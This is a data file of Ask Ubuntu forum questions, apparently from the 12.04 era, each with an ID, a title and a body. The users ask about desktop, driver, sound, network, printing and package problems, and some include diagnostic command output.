130732	compiz commands `` edges actions '' ( screen edge bindings ) not always enabled on startup .	when logging in , edges are sometimes unresponsive , ie right click on the edge brings the usual right click menu instead of the compiz command . and yes , compiz is running ( wmctrl -m - > compiz ) . it can be fixed with a `` compiz -- replace '' but it 's a bit frustrating . any idea how to fix this ? or to check compiz logs on startup ? known bug ? also , unrelated , compiz scale plugin `` on a group of window '' never works ...
130735	ubuntu one authentication process	i went to sign up for ubuntu one and during the sign up process , i had to wait for the authentication code before i could proceed . i thought this was an instant process and it took a while for the email to come . so i exited the program and now i cant find where to enter in the authentication code at or how to bring it back up . any help would be appreciated , thank you .
130738	routing the printing through wireless , rest through lan	i am connected to the lan and the wireless . the lan allots an ip of the form 10.x.x.x while the wireless allots and ip of the form 192.168.x.x . i can not change the ip of the lan as it is a managed lan . there are 10 pcs using the managed lan . i have set up the printer on a wireless router . the printer is connected wirelessly to the wireless router . my problem - every time i have to print , i have to disconnect from the lan and then issue a print over the wireless . then re-connect the lan cable once the printing is done . it is a little annoying . i am sure i am doing something silly , but i cant figure out what . is it possible to route the print commands through the wireless and have the lan for my regular internet connectivity ? edit - output of route -n : kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 10.33.11.1 0.0.0.0 ug 0 0 0 eth0 10.33.11.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 eth0 192.168.1.0 0.0.0.0 255.255.255.0 u 2 0 0 wlan0
130741	how to install ubuntu 12.04 to eee pc 1225b ?	how to install ubuntu 12.04 to eee pc 1225b ? i tried to install from usb flash and usb cd - ubuntu , xubuntu , debian , fedora , mint . installation is going well , but after installing the os will not boot . hardware specs
130742	ext4 and ntfs partitions recovery	i had two partitions in ntfs and one in ext4 ( ubuntu 12.04 installed one week ago ) , something gone wrong and the os couln 'd start . i tried to reinstall a new version and by mistake choosed the option to install the system on the previous , he erased all the data i had ( ntfs and ext4 ) , i wanted to format only the ext4 partition . on the ntfs partitions i had very important data . how can i recover it ? what applications should i use ? thank you in advance .
130746	terminal does not appear in launcher	whenever i open a terminal in ubuntu , it does not appear in the launcher , as depicted in the following screenshot . it does n't even show up when i press alt+tab ! is this a bug ? is there a known solution ?
130750	how to shift my shared folder from /mnt to desktop in ubuntu ?	i recently installed ubuntu 10.04 in my mac using virtual box . i mounted two of my folders in mac using virtual box . but the problem is , i created my shared folder called `` share '' inside /mnt . how do i get the share folder to appear on the desktop and how do i get it to auto-mount on start-up ?
130758	how to configure kubuntu fonts to look line ones used in unity - ubuntu 12.04 ?	because unity and gnome3 where too buggy and unstable i switched to kubuntu and now i do have a really good speed and , so far , stability . still , the problem with kuduntu , is the all the fonts are broken , ugly like s*** , with an weird anti-aliasing . i 've seen other complaining but i was n't able to find the proper set of settings to make it look uk . btw , i put a strong interest on having fonts look good in chrome and thunderbird . optional : i would also like to change the theme ( maximize/minimize buttons ) to something better . make chrome use it 's own theme instead of having the default kde titlebar .
130759	icons of external devices not appearing on desktop	in 10.04 and all , when a pen drive or as for that matter , when any external devices are connected , their icons are shown on the desktop and nautilus pops up automatically too . but in my 12.04 gnome classic , when i connect an external device , nothing happens . i have to open nautilus manually and then click on the icon in the left panel to access the folder of the device . is there any way to rectify this and restore the old trait as in 10.04 ?
130760	error on starting computer after upgrade	the ubuntu upgrade from 11.10 to 12.04 get problem , while the time was remaining about 4 mins the current interrupts so the computer get started and it says small file expected than header ... . and the computer gets hangs upon . what may be the solutions .
130761	connect to dhcp printer server	hope someone can help me . knowing that on windows , what i do is to open windows explorer and tape \\srv-dhcp . how to do the equivalent on ubuntu ? thank you for your help .
130762	proper way to mount nas shares w/o password in fstab ?	i have a 10.04 desktop machine that i use as a nas . i have 3 shares on that box which i 've been attaching to via mounting at startup in my fstab . i do n't like the fact that have my user name and password right out in the open in my fstab . here 's how i 'm doing this today.. //192.168.0.40/data /media/nas-data smbfs username=my-name , password=my-password @ 0 0 btw , am no necessarily married to smbfs , but do want a way to have the credentials cached/saved so i do n't have to enter them at startup ( if doable ) ...
130766	does the apache/php5 package include zend ?	i 'm loading up a fresh development computer for one of my new hires . as a standard , i put in a very basic lamp server on all of our development computers . the one i 'm currently loading is running 12.04 x64 . i load in the following packages : apache2 mysql-server php5 phpmyadmin and i pretty much say yes to all of their dependencies . i put in a phpinfo ( ) file into the root of my /var/www to double check what comes with the base install of lamp , and was surprised to find a section on zend . specifically it says : this program makes use of the zend scripting language engine : zend engine v2.3.0 , copyright ( c ) 1998-2012 zend technologies does that mean that the base install of a lamp server includes zend ? we do n't use zend anywhere in our stack , and i do n't love the idea of it being installed on our computers without any specific use .
130768	my home partition slowly fills up until the system is unable to complete even simple tasks	so i have an awesome configuration on my home pc . my /home directory has its own partition . my home partition slowly fills up until the system is unable to complete even simple tasks . for example , when this issue has occured , i can load up firefox . it just pops up an error message saying that it can not be done . rebooting solves the issue . the strange thing is , i 've run baobab and it does n't notice a problem . there should be hundreds of gigabytes of data somewhere , but it does n't see it . does anyone have any idea of how i might troubleshoot this issue ? i 'm thinking i could do lsof but i 've always found the output of that to be too much information . maybe my drive is , like , dying . edit : is there a /home analog of /var that gets cleared out at boot time ? maybe i could check in there next time i notice this problem to see if i can divine what 's up . update : i found the issue . my .xsession-errors file is filling up with authentication deferred - ignoring client message is there a way i can see what is causing this error and fix it ?
130771	menu bar not visible on gnome-calculator	i want to set my gnome calculator in programming mode to do some hex calculations but there is no menu bar visible on the gcaltool app .
130772	how do i modify the pxe config in maas ?	i 'm using maas , during the commissioning step , i have full error on the screen timeout : killing /sbin/modprobe -bv pci i investigated a little and apparently it 's an acpi issue . so i tried to change and add a parameter to this file /var/lib/tftpboot/pxelinux.cfg/default . i added those options in the default append noacpi noapm pci=noacpi lba acpi=off apm=off but each time i restart the maas-pserv run the commissioning procedure this file is re-regenerated . how to overcome this ? thanks ! edit1 : i saw that in the cobbler logs thu may 3 15:27:56 2012 - info | generating gpxe/pxe configuration files thu may 3 15:27:56 2012 - warning | warning : kernel option length exceeds 255 thu may 3 15:27:56 2012 - info | generating : /var/lib/tftpboot/pxelinux.cfg/01-00-1d-09-f0-4b-c2 but generating configuration from which default file ? there is so many files in /etc/cobbler/pxe
130773	no sound on dell inspiron 6400n	after a clean install of ubuntu 12.04 on my dell inspiron 6400n laptop there is no sound on any application i use apart from the log in screen ready noise . if i click on the speaker icon on the top panel then sound settings it tells me that the default playback device is s/pdif . in alsamixer the slider is set to zero . i am sure it should be hda intel or similar . how can i get the sound working please ... ?
130776	jungle disk desktop stopped working in ubuntu 12.04	i 've recently upgraded from to ubuntu 12.04 . when i upgraded , i re-installed jungle disk desktop and it was working fine , but a couple of days later , i started getting a jungle disk error saying to check the application for details . that 's when i discovered that i could n't get to the application . i tried whitelisting the application , but that does n't seem to work .
130778	software-center painfully slow ubuntu 12.04	one week ago , i had only ubuntu 12.04 on my machine , i was exited of the improved speed of the software-center . but yesterday , i erase ubuntu and after fresh install of windows 7 , i install ubuntu 12.04 again for dual os , because i need property working of photoshop . so , what is my problem : now i must wait about 4-5 minutes software-center to start , until this happen there is only a blank screen . i reinstall software-cente , without any effect . any advices ?
130779	how do i set icons in the top panel with arbitrary spacing , as was possible in 10.10 ?	just installed 12.04 on a laptop ; i still have 10.10 on a server so i can compare directly and not just rely on my memory . generally 12.10 is ok but the ui has taken a major step downhill . i have reverted to gnome classic which goes most of the way to the old look and feel but the icons will not stay where i put them . they either go to the left or the right or the centre but i want them where i put them , so that i get reasonable spacing . i have had a look at the settings via dconf-editor : i looked for something like 'snap-to-alignment ' or the like but found nothing . i have a bad feeling that this may be some new feature of the underlying ui widget , i.e . in the source , rather than a configurable value . the answer from here : how can i evenly space icons in the panel ? is to use active window navigator and stop fighting with the current panel . is that the best i can do ? thanks , john
130781	how to compile c++ source code ( `` iostream.h not found '' error ) ?	i do not want to discuss about c++ or any programming language ! i just want to know what am i doing wrong with linux ubuntu about compiling helloworld.cpp ! i am learning c++ so my steps are : open hello.cpp in vim and write this # include < iostream.h > int main ( ) { cout < < `` hello world ! \n '' ; ` return 0 ; } so , after that i tried in the terminal this g++ hello.cpp and the output is hello.cpp:1:22 : fatal error : iostream.h : no such file or directory compilation terminated . what do you suggest ? any useful step by step guide for me ? thanks !
130786	ca n't change flash settings from chrome neither firefox	i 'm getting a problem since ubuntu natty until ubuntu precise , and i guess it 's unity-related . this image describes my problem : i 'm on my pc with ubuntu precise and i open any flash content , like flash animations on the web . i do these steps : put mouse over any flash content ; press right mouse button and choose settings ( my screenshots are in portuguese 'cause i 'm brazilian ) ; try changing any info on the flash dialog that shows in the middle of screen . using unity 3d , i ca n't change anything on that window . i can do it if i 'm on unity 2d or gnome2 , but not on unity 3d . this happens both in chromium and firefox browsers . okay , so what 's the big deal here ? sometimes i need to use some flash-based online services that uses mic and webcam , like big blue button web conferencing system used in distance education per example . everytime i run a flash content that needs to use any external device , like mic or webcam , the same dialog shown in step 3 pops up and asks for my confirmation to use external device . since i 'm on unity 3d , i ca n't press button that gives permission for using my device on flash , because that window stays locked . this way i end up stucked . anyone know a solution for this problem ?
130789	unable to install flash plugin due to a proxy	yesterday i upgraded from ubuntu 11.10 to ubuntu 12.04 ( 64 bit ) . the upgrade went smoothly ( far more than i expected ) . unfortunately , i can not seem to install the flash plugin in either firefox or chrome . chrome : //plugins does not show flash . i tried 19:17farhat ~ $ sudo apt-get install flashplugin-installer reading package lists ... done building dependency tree reading state information ... done flashplugin-installer is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . yet , i can not seem to find anything related to flash on the system . 19:17farhat ~ $ sudo updatedb [ sudo ] password for farhat : 19:17farhat ~ $ locate libflashplayer.so 19:17farhat ~ $ locate libflashplayer 19:17farhat ~ $ locate libflash /usr/lib/libreoffice/program/libflashlo.so 19:17farhat ~ $ i am at the end of everything i know . any help will be appreciated . i have tried removing and reinstalling the package . still the same results .
130792	linux permission issue	i am using ubuntu linux and am new to linux . when i try to try to edit some files it requires root privileges . following command gives a permission error : echo `` xyz '' > abc.txt but using sudo echo `` xyz '' > abc.txt works i want to do the same thing from ui . so how can i do it ? also some files like hosts and hostname can not be edited . any clues on this ? i guess they are read only . how can i make them writable ?
130800	turn off software center putting apps in dock automatically	in 11.10 , when i installed a desktop app it had a check box in the software center entry for that app to install it to the dock right away . sometimes i did , sometimes i did n't , depending on how much i planned on using that app . now in 12.04 it seems to default to jamming a new icon into the dock , without asking me and , so far as i can tell , no way to turn it off or revert to the 'old ' behavior . am i missing something here ? is there an easy way to turn this 'off ' ?
130803	gui hangs when using multiload-indicator	i upgraded to 12.04 tuesday ( 1 may ) and as of 3 may the gui has hung 4-5 times : the clock stops moving the mouse cursor is responsive , but nothing happens when i click i can ssh to the machine i have tried killing various processes , but have not found which to kill to make any difference , so i end up rebooting . i applied an update from yesterday ( which was a new kernel ) and that has not helped . linux berlioz 3.2.0-24-generic # 38-ubuntu smp tue may 1 16:18:50 utc 2012 x86_64 x86_64 x86_64 gnu/linux machine : intel 2 duo x6800 , asus p5b deluxe , graphics : nvidia geforce 7300gs ( 256mb ) i 'm not using unity ( gnome3 instead ) , i did not install compiz , but i do n't know if it 's installed . obviously this makes it pretty much unusable . what can i do to capture some information so that someone can tell what 's going on and i can get a fix ? or is there any process i can kill that will allow me to avoid a reboot ? if this can not be fixed soon , is there a way to move back to the previous working release ? edit : i followed the suggestions in the answer to this question : stuck at login screen and now my system will not boot . the last line it gives is : starting timidity++ alsa midi emulation [ ok ] ( this happens consistently upon a full boot -- i suppose i need to see what 's happening next in the boot , or perhaps remove the timidity thing in recovery mode somehow ) edit2 : i was able to boot in recovery mode after changing the gdm to use lightdm , i can not boot normally . i will try to see what 's happening in dmesg if the hang happens again . edit3 : dmesg output at the time of the hang : http : //pastebin.com/jnvdhcyg edit4 : i have filed this bug report : https : //bugs.launchpad.net/ubuntu/+source/xorg/+bug/994306 edit5 : another data point , this seems to be related to the multiload indicator that shows multiple bar-graphs in the gnome panel . i switched to this type of system indicator when upgrading to 12.04 ( i previously used a different one that showed only a single bar graph , but i could not find that one again after i updated ) here is a link to the multiload-indicator that seems to be causing the problems : http : //www.omgubuntu.co.uk/2012/02/easily-monitor-system-resources-in-ubuntu-with-indicator-multiload/ note that i use this in the gnome-panel ( below ) rather than that indicator bar that it at the top . since i have disabled this multiload-indicator , the problem has not happened once .
130808	stop xscreensaver from locking screen once screensaver starts	i have installed lubuntu 12.04 and was wondering if there was a way to keep it from locking the screen when the screensaver starts ? the `` lock screen after x minutes '' box is unchecked , so that is not causing the problem . does anyone know the solution for this problem ? i 'm not worried about security , so i do n't need it locked .
130809	sound not working after 12.04 install	i have recently installed 12.04 , but the sound is not working from both internal speakers , and from headphones when i connect them . i have followed the instructions at https : //wiki.ubuntu.com/debuggingsoundproblems to no avail and submitted a bug report . i 've also tried running alsamixer and unmuting a few more things , but that did n't work . i 've tried to upgrade alsa sound drivers by running : sudo add-apt-repository ppa : ubuntu-audio-dev/ppa sudo apt-get update sudo apt-get install linux-alsa-driver-modules- $ ( uname -r ) however on the last command : $ sudo apt-get install linux-alsa-driver-modules- $ ( uname -r ) reading package lists ... done building dependency tree reading state information ... done e : unable to locate package linux-alsa-driver-modules-3.2.0-24-generic-pae e : could n't find any package by regex 'linux-alsa-driver-modules-3.2.0-24-generic-pae' what should i do to try get sound functioning ? it might be worth noting that 10.04 previously ran on this machine with no sound problems .
130811	boinc not working	i upgraded from 11.10 to 12.04 last week and boinc stopped running instantly . i understand that there is a problem with boinc and 12.04 -- there seems to be finger pointing in both directions at this point in time . it seems that boinc is working on a 7.0.27 release and that bug reports have been registered with launchpad . not sure where response should be coming from ~~~~~ boinc still not working ! by the way - i use `` seti @ home '' as my project . 7.0.25 is my current boinc install .
130815	how to add a rule for loggin packets in ufw	i 'm seeing a lot of connections with source 0.0.0.0 and destination 0.0.0.0 in conntrack . i want to log these packets which have source 0.0.0.0 and destination 0.0.0.0 so that i can digg this issue further . can you tell me how can i add a rule which logs a packet in ufw ? thanks .
130817	how to get mgse under gnome 3.4 ? ( or how to go from gnome 3.4 to gnome 3.2 ? )	i just upgraded from oneiric to ubuntu 12.04 . i also installed gnome shell 3.4 , the only problem with it is that i ca n't use my favourite shell extensions ( mgse ) . does anyone know a way i could still get gnome 3.2 or how to get mgse on gnome 3.4 ? your help would be appreciated
130819	toshiba l745 brightness problem , fn keys does n't works	has someone solved the brightness problem in toshiba laptops ? i have a toshiba l745-s4210 laptop with an intel hd 3000 graphic card , after install ubuntu all works out of the box except the keys to change the brightness , there are some similar questions but some have nvidia graphic card instead intel , suggestions ?
130821	extremely slow login after upgrade from 11.10 to 12.04	i just upgraded my xubuntu 11.10 to 12.04 and now , when i login into the gui , i have to wait about 3 minutes before the desktop appears . only the background image is displayed . the login into the console works fine ( with ctrl+alt+f2 ) even stranger : if i login first in the console and then in the gui , it boots quickly . if i login first in the gui , switch to console and login , it takes 3 minutes to boot in the gui . my machine is a thinkpad t420s .
130830	upgrade path for jaunty server ?	i have a very old installation of jaunty that i would like to eventually get up to the current version of ubuntu lts . i can not do the normal network upgrades , as there is no continued support for this . my question is , can i mount a .iso file for ubuntu 10.04 and upgrade to that from this mounted cd ? i understand that it would be better to do a fresh install at this point , but that may be difficult , as i do n't have direct physical access to the server .
130834	vdpau performance in precise with unity 3d	vdpau seems to be broken in precise under unity 3d . cpu usage ranges around 50-70 % for 1080p movies while same movies utilizes around 5-10 % in natty with vdpau enabled ( under unity3d ) the card is nvidia g105m . it does n't seem to be a nvidia driver problem because in gnome-shell everything works as expected and i have tried different versions of nvidia drivers ( 295.20 , 295.33 , 295.40 and the latest 302.xx from xorg-edgers ) the results are all the same , works in gnome shell but not in unity 3d . disabling syn to vbank works if movie is not in full screen mode , but it does n't work for full screen . i have searched around and have n't found much info . i am wondering if others are experiencing the same problem and if there are some known work around that i have missed . unity 3d is otherwise very nice in precise , but this is a show stopping issue for me ( literally ) . thanks . i have filed a bug here https : //bugs.launchpad.net/unity/+bug/993397
130837	i ca n't see applications other than those in launcher	i have ubuntu 11.10 . when i installed it i could see my applications , but anytime after installation , i ca n't see my applications and i can only use the aplications that i have in my laucher .
130843	12.04 performing worse than 11.10	for what reason , do you think , 12.04 performs worse than 11.10 ? i recently fresh-installed 12.04 and have found that the general screen animations ( like swiping between desktops , window fading , etc ) are noticeably stickier than 11.10 , under the same conditions . overall , 12.10 is superior to 11.10 , so i 'm not complaining . but the generally worse compiz smoothness is somewhat irritating . it 's not unbearable , but it 's certainly not smooth at times . at times . not always . for example , if i move between desktops , then the first one or two animations are bumpy . after that , it 's fine . it 's as if the animations need `` warming up '' . of course , if i do n't move between desktops for a while , then it becomes bumpy again . could it be because my nvidia graphics cards ( i have two ) are running as `` adaptive '' ?
130849	how can i remove ubuntu from my system and install the windows bootloader ?	i want to completely remove ubuntu from my system . but if i delete the partition , the grub files will be deleted and that will leave me `` bootloader-less '' . how can i workaround this ?
130850	mouse freezes on xorg load	sorry to be a pain , but i 'm joining the crowd of people who are experiencing mouse freezing/unresponisveness after upgrading from ubuntu 11.10 to 12.04 . on the login screen , i can move the mouse and type freely , there is no problem . however , as soon as my desktop wallpaper image appears , the mouse and buttons no longer respond to input . the keyboard continues to work normally . given that it works on the login screen but not the desktop environment , i 'm not sure whether or not this is an issue with x.org - i 've got no idea . the mouse in concern is a built-in synaptic touchpad . unfortunately , i do n't have a handy usb or ps/2 mouse available . list of things that did n't work : synclient touchpadoff=0 ( the mouse works on the login screen anyway , so the synaptics driver is loaded ) generating and replacing /etc/x11/xorg.conf sudo rmmod psmouse ; sudo modprobe psmouse disabling irqbalance restarting lightdm replacing ~.gconf reinstalling xserver-xorg-input-all the output of lspci -v , dmesg and synclient are attached , in case they are of any use . i 'm trying to avoid a fresh install , but i 've backed everything up just in case . www.callummclean.cu.cc/stuff/dmesg.txt www.callummclean.cu.cc/stuff/synclient.txt ( lspci in the next post ) thanks in advance , cal mclean
130851	how can i remove wallpaper and use just one color background in the new ubuntu 12.04 ?	in the new ubuntu 12.04 can we have no wallpaper , just one plain background color ? in all the hundreds of systems i have know it is very easy to set a plain black background . why is ubuntu doing this things so difficult ?
130854	how to disable remmina remote desktop automatic shortcuts ?	i noticed that remmina remote desktop comes installed by default in 12.04 . this is great because i have used it in the past and really enjoy it . anyways , there is a little problem . when i am doing rdp connection to my windows 7 machine , it seems that windows shortcuts are enabled by default , without pressing ctrl or alt or the windows button . every time i type the letter `` f '' , the search window pops up in the windows environment , and the text `` f '' is never entered into the email . as you could see , writing an email or editing other text is almost impossible like this . has anybody had any experience with this ? know how to fix it ?
130856	my printer requires `` modprobe '' and `` ccpd '' to be started after every system restart .	in each time i start my ubuntu 12.04 computer i need to type the following commands to get my canon lbp 2900 printer working . otherwise the status monitor says `` communication error '' . i am using driver version 2.40. sudo modprobe usblp ls -l /dev/usb/lp0 sudo /etc/init.d/ccpd start
130858	system monitor shows downloading while lsof -i says nothing downloading	when i checked system monitor it says there is something downloading but lsof -i showing nothing . http : //i47.tinypic.com/1zqadm9.png my isp provider allows me to connect to a single host at a time . so simultaneous connections wont allow me to browse or anything . when i do sudo lsof -i command pid user fd type device size/off node name systemd 1 root 27u ipv6 14623 0t0 tcp * : ipp ( listen ) systemd 1 root 28u ipv4 14624 0t0 udp * : ipp avahi-dae 932 avahi 12r ipv4 16956 0t0 udp * : mdns avahi-dae 932 avahi 13r ipv4 16957 0t0 udp *:50944 httpd 1085 root 4u ipv6 18759 0t0 tcp * : http ( listen ) httpd 1170 apache 4u ipv6 18759 0t0 tcp * : http ( listen ) httpd 1174 apache 4u ipv6 18759 0t0 tcp * : http ( listen ) httpd 1175 apache 4u ipv6 18759 0t0 tcp * : http ( listen ) httpd 1179 apache 4u ipv6 18759 0t0 tcp * : http ( listen ) httpd 1183 apache 4u ipv6 18759 0t0 tcp * : http ( listen ) httpd 1184 apache 4u ipv6 18759 0t0 tcp * : http ( listen ) httpd 1189 apache 4u ipv6 18759 0t0 tcp * : http ( listen ) httpd 1192 apache 4u ipv6 18759 0t0 tcp * : http ( listen ) mysqld 1253 mysql 10u ipv4 19195 0t0 tcp * : mysql ( listen ) cupsd 1789 root 4u ipv6 14623 0t0 tcp * : ipp ( listen ) cupsd 1789 root 5u ipv4 14624 0t0 udp * : ipp cupsd 1789 root 12r ipv4 24001 0t0 tcp localhost.localdomain : ipp ( listen ) sendmail 2057 root 4u ipv4 25935 0t0 tcp localhost.localdomain : smtp ( listen )
130860	how to use keystrokes to browse with nautilus	very often , when i use a file manager , i like to use the keyboard to move around . in nautilus this is very difficult . for example , when i press alt + â with a folder selected , it opens ; but how can i close it gain ? in some other file managers you can do so by pressing alt + â .
130863	synaptic package manager opens with error report	i am on ubuntu 12.04.uname -a out put : linux bravery -- notebook-pc 3.2.0-24-generic-pae # 38-ubuntu smp tue may 1 16:40:26 utc 2012 i686 athlon i386 gnu/linux when i open synaptic , it shows this error : please help . update : the text output of sudo apt-get install -f : bravery @ bravery -- notebook-pc : ~ $ sudo apt-get install -f [ sudo ] password for bravery : reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/liveusb.info_multisystem_depot_dists_all_main_binary-i386_packages e : the package lists or status file could not be parsed or opened . problem solved : i removed the repository for the given package and now everything runs but feel my system get little slow .
130864	eclipse/pydev not showing up correctly	i recently installed eclipse from the software center in ubuntu 12.04 lts , and then setup pydev from there . the application itself seems to be working okay , but its launcher icon shows no carets or other indication that it is already running . also , eclipse does not show up when i hit 'alt+tab ' to cycle between open applications . it does show up when i hit 'super+tab ' , though . any ideas ? monte
130866	update to percise seems to have broke everything display wise , my screen is now a mirrored garbled mess that is entirely unreadable . help ?	update to percise seems to have broke everything display wise , my screen is now a mirrored garbled mess that is entirely unreadable . any ideas on how to get it working again ? for obvious reasons i ca n't really give many more details , i 've attempted to reinstall flgrx and even to ssh in , but for some reason i ca n't even get the network services running . any tips on how to force a return to the default drivers from a command line i can do little more than type into and pray ?
130879	switching from netbook edition to desktop-edition	so i 've get the official kubuntu 12.04 cd . i 've installed it on a netbook . it have installed a netbook edition ( without asking me ... ) . so that i see while i would really prefer the standard plasma : i seem to have kubuntu-desktop package installed . how do i switch the plasma to the desktop one ?
130881	how can i kill an application after a specific amount of time ?	i want to stop/kill my totem player after a specific amount of time . can it be done ?
130886	how to increase the limit of unity launcher 's sensibility	when i change the sensibility of the launcher in the `` change desktop background/behaviour '' , for the auto-hide mode , it does n't really change . i ca n't appreciate the change . as a consequence it is hard to bring it up and annoying . is it like that in all pcs or is it in the apple computers ?
130890	difference between unity and 2d	i ca n't tell the difference between 2d and unity ( 3d ? ) when i log in with the trial livecd . how can i tell which one i am using and if i am using compiz ok ?
130898	what is the best email client for microsoft exchange server 2007 ?	i just tried to set up evolution with the mapi plugin to connect to my exchange server 2007 , as is described in this link - > https : //www.linux.com/learn/tutorials/370590-connect-evolution-to-an-exchange-server . this is did not perform very well , it kept freezing and could not send a message , although it did retrieve a lot of info from the server , it just was n't doing the job . i am going to try thunderbird now , with smpt . maybe it will work . what have you all had the best luck with , as far as an email client for microsoft exchange server 2007 ? thanks a lot ! ! ** update ** so i set up thunderbird . the setup wizard automatically detected my server settings and this worked well for retrieving the information from the server ( like inbox and custom folders ) . the sending did n't work by at first . there was a problem with the smtp authentication . i tried each authentication method until i was successful sending a message . the one that worked was ntlm . thanks for the good tips for this problem ! ** update ** it has been a few days using thunderbird . it seemed like it was working at first , but now i see that it is not performing very well . every time the program runs , it hangs on `` bringing inbox up to date '' . also when you first open the program , it seems to retrieve the new email messages correctly , but after the program is opened , it hangs and will not get new messages that have been sent since opening the program ... back to the drawing board .
130899	how can i configure alpine to read my gmail in ubuntu ?	i would like to use a terminal based mail client for my e-mail activities . i 've been suggested to use alpine for it . but how do i configure it in ubuntu to read my gmail mails ?
130900	how to use the default/unthemed gnome ?	sometimes i get the error that seems to be described in this thread ( see this post for an image ) . however , despite it being an error , i actually enjoy the theme ( or lack thereof ) with it 's carved buttons , no rounded corners and clear boundaries between elements . maybe it just feels nostalgic , but anyway -- i want to know how to keep that theme ( non-theme ? ) permanently . btw , it does n't seem to be the clearlooks theme , which according to what i read is the default gnome theme , so i 'm inclined to believe that it is gnome unthemed .
130901	how to change ubuntu one password ?	i 'm using ubuntu 11.10 and having problem as under : i have my user account password and when i open `` system settings > > user accounts '' the dialog get unlocked by providing current password . also when i open terminal1 it asks for password ; i give the same password above and it works . the problem comes where i open ubuntu one it asks me password and only works if i give my old password of my user account which i changed earlier . also aother noticable thing is ; user account dilog and terminal needs password to process further but when i log out and need to log in again it shows me list of user accounts ( me , guest etc . ) it not demands for password although it shows login button on that place ! please help me to change the password for ubuntu one and to create a one only password for all this !
130908	using the randr-enabled nvidia 302.xx beta driver in 12.04 with a realtime kernel	how can i use the recent beta of the 302 version of the nvidia driver ( which finally supports the randr extension ! ) with a realtime kernel in precise ? this question contains information on enabling the current 295 version for the 3.4 kernel with the rt patch . but i 'm looking for an answer that installs the nvidia driver using the package manager rather than nvidia 's installer ( whose installations break every so often due to the package management system overwriting files ) .
130909	why does lsb_release -a list all those modules ?	when i type lsb_release -a i get this : i tried it a couple of days ago and i saw something more like this : why do i get all that ?
130915	optical mouse temporarily turns off when system is idle	i 've been using kubuntu for a few years now and had no trouble at all . last week , i upgraded it to kubuntu 12.04 , and since then , have been having trouble with my optical mouse . the mouse works fine as long as i am actively using the computer . if i pause for more than a short period of time ( about a minute ) , the light on the mouse turns off , and it no longer responds to motion . if i click one of the mouse buttons , or push a key on the keyboard , the light turns back on and the mouse responds normally again . the fact that the keyboard usage turns it back on seems to indicate that this is a power saving function . i have however disabled all power saving features , and continue to have this problem . any suggestions as to the cause/fix for this ?
130917	bumblebee : module bbswitch could not be loaded	i 've upgraded to 12.04 and i had to switch from ironhide to the latest version of bumblebee . now , when i try to run bumblebeed , i get this error : fatal : module bbswitch not found . [ error ] module bbswitch could not be loaded ( timeout ? ) [ warn ] no switching method available . the dedicated card will always be on . i do n't really need to use the secondary vga on kubuntu , so i would like to find a way to definitely shut the discrete gpu down and avoid wasting battery . i ca n't disable it from the bios because i use it on windows . my card is an nvidia 540m .
130918	mysqld not starting on boot ?	after upgrading to pangolin , mysqld is not starting on boot . i 've looked into various other mysql issues with the pangolin release , and i have n't seen the same issue that other people are having ( mysqld bouncing , etc ) . once i run it from the command line , it runs just fine . where do i add the command to start the service on boot ?
130920	unity dash launcher icons get lost	i do n't know why this happens to some applications , but some launchers i added by drag and drop to the left bar are suddendly lost at next login . did anybody watch this too and how can i solve it ?
130921	how to configure firefox to use oracle java in xubuntu 12.04 ?	it was ok in the past but something has broken some months ago and my bank client authentication java applet stopped working . now i have to reboot to windows and use it from there . i have installed ( and am using for different purposes ) oracle jdk ( manually , from official oracle distribution files ) on xubuntu but i think firefox java plugin still uses openjdk . how to set up and make sure firefox to use a specific oracle jdk ?
130927	how to switch 'default ' sound device controlled by hardware keys in xubuntu ?	i installed xubuntu-desktop on a 12.04 ubuntu upgrade after finding gnome3 lacking . i 've mostly been happy , but i 've found an odd and frustrating bug . my laptop has two sound 'outputs ' - an hdmi-out plug i never use , and the onboard speakers/headphones . for some reason , the hardware keys have been mapped to the hdmi output , even if i set it as 'fallback ' in pavucontrol , and notify-osd only displays changes in the hdmi output ( though the panel indicator volume control controls onboard sound ) . i 'd ideally like both hardware keys and notify-osd to be looking at the onboard sound , though if i ca n't get notify-osd it 's an acceptable loss . having to click through a bunch of stuff to change volume is driving me crazy , though . googling suggested that it /may/ be a pulseaudio/alsa conflict , but the hardware keys seem to change at least indicated volume in pavucontrol for hdmi as expected ( i do n't have an hdmi cable to test actual sound output )
130937	how do i install vmware player ?	i ca n't install vmwareplayer 4.0.3 on ubuntu 12.04 64bit . for version 4.0.2 , i found a script that i have to run and after that i could install 4.0.2 . is there an similar solution for version 4.0.3 ?
130942	how to hide one particular software from appearing in the software center & dash	you may think that dos n't matter , but i realy want to use ubuntu 12.04 without this program , pornview , in software center for personal reasons . thus my question is , how do i hide a particular piece of software from appearing in software center and the dash ?
130943	switch from ubuntu 2d to ubuntu	while loging in i chosed `` ubuntu '' but when launch my unity receive message `` ubuntu running in 2d mode ... '' and some options in compizconfig are disabled . i am instaled ati radeon proprietary driver and now it 's activeted but when try to install post released updates then be a problem with installation and ca n't activate it . ... and i ca n't launch ctalyst control centre ( as one of the reasons stated- the amd driver is not functioning properly . ) ... and still ca n't switch to ubuntu 3d .
130944	how i can delete specific applicatios/packages without their dependencies ? is it possible ?	i want to delete akondaitray which comes with k3b installation . how can i do that ? when i try to remove akondaitray , synaptic shows it is gon na remove all kde applications . is it really possible to delete specific packages from ubuntu ?
130946	how can i know the dependencies of a certain package ?	is it possible to list out the dependencies of a software/package in ubuntu ?
130948	multi-desktop amd hd6870 12.04	i 'm currently trying to set my monitor up as multi-desktop . ive got two monitors , a 1920x1080 ( 1 ) and 1280x1024 ( 2 ) . the problem is that im getting a normal desktop on one of the screens , while the other one is blank ( grey ) with a cross as cursor . which display getting gray seems to be the one placed to the left in amdcccle . ive tried enabling xinerama , which gives me a desktop on both monitors , but unity does n't appear . im using the newest amd-drivers ( 12.4 ) . 1 is connected with hdmi 2 with dvi heres my xorg.conf : http : //pastebin.com/k7u8xmut can anyone help me out ? : )
130954	why can libre office not run .pptx properly	i have a powerpoin file that i want to see . i can open the file but not play the sound files and the text is placed wrong so you cant see some text cuz other text is over it . i can open the file in office 2011 . is there any way to fix this ? why cant libre office just bee as good as office 2011 and just work ? and cant you just port office 2011 rename it to ubuntu office and make it free ? or at least make a program that works ? can i post the file here so you can test and see ?
